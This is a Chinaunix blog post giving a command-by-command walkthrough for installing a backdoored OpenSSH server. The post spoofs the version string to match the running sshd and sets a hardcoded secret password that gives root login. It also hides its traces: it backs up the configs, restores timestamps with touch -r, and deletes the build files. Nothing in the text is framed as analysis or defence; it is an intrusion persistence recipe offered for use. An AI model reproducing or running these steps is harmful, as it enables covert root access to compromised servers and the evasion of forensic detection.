Chinaunix首页 | 论坛 | 博客
  • 博客访问: 7612110
  • 博文数量: 1769
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16352
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1769)

文章存档

2024年(15)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

分类: LINUX

2009-07-23 14:24:09

How to install
 
shell-# wget
shell-# tar zxvf sshbd.tgz
shell-# cd openssh
 
Edit version.h likes the current version of ssh running on the box
#define SSH_VERSION "OpenSSH_4.2" --> you've to edit OpenSSH_4.2
 
Edit includes.h, specify your backdoor password
#define _SECRET_PASSWD "q1w2e3r4t5: )" -> edit as u wish  
 
shell-# ./configure --prefix=/usr --sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
shell-# /etc/init.d/sshd restart
 
FINISH, try logged in to the box "ssh -l root "
enter your backdoor password.
 
Boom, now you're root
 
wget
tar zxvf sshbd.tgz
cd openssh
vi version.h
#define SSH_VERSION "OpenSSH_4.2" --> you've to edit OpenSSH_4.2
vi includes.h
#define _SECRET_PASSWD "q1w2e3r4t5: )" -> edit as u wish
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
cp /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
touch -r /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
touch -r /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
cp /usr/bin/ssh /usr/bin/ssh-key.pub
touch -r /usr/bin/ssh /usr/bin/ssh-key.pub
./configure --prefix=/usr --sysconfdir=/etc/ssh
make && make install
cp ssh_config sshd_config /etc/ssh/
cd ..
rm -rf ./ssh*
rm -rf openssh
diff /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
vi sshd_config
diff /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
vi ssh_config
touch -r /etc/ssh/sshd_config.pub /etc/ssh/sshd_config
touch -r /etc/ssh/ssh_config.pub /etc/ssh/ssh_config
touch -r /usr/bin/ssh-keypub /usr/bin/ssh*
/etc/init.d/sshd restart
 
阅读(956) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~